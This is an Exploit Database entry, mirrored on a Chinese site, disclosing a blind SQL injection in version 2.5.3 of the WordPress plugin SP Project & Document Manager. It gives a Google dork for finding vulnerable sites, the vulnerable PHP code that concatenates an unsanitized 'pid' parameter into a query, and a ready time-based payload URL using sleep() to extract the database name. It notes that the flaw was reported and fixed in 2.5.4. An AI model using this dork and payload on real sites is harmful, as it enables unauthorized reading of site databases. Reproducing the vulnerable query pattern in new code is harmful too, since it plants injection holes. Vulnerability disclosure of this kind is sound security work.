WordPress Plugin SP Project & Document Manager 2.5.3 – Blind SQL Injection

• Exploit Database
• 35 阅读

• 作者： Catsecurity
  日期： 2015-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36576/

• # Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
  # Google Dork: inurl:wp-content/plugins/sp-client-document-manager
  # Date: 2015-03-04
  # Exploit Author: catsecurity
  # Vendor Homepage: http://smartypantsplugins.com
  # Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
  # Version: version 2.5.3 and previous version
  # Tested on: Chrome (It's PHP Application)
  # CVE : N/A
  
  
  # Timeline #
  [2015.03.05] Reported to the Vendor
  [2015.03.06?] Fixed in Update 2.5.4
  
   
  # Details #
  
  - This vulnerability did not process integer parameters. Unauthorized users can attact the webstites that use this plugin.
  - Vulnerability code in the thumbnails() function which exists in the [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
  - "pid" variable is not sanitized
  
  
  # Vulnerable code #
  
  Line 1132:echo '<div id="dlg_cdm_thumbnails">';
  Line 1133:if ($_GET['pid'] != "") {
  Line 1134:$r_current_project = $wpdb->get_results("SELECT *FROM " . $wpdb->prefix . "sp_cu_projectWHERE id = " . $_GET['pid'] . "", ARRAY_A);
  Line 1135:}
  
  
  # POC #
  /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]
  
  example:
  /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)
  
  if yes it will sleep 5 seconds.
  
  
  This vulnerable parameters must trance to integer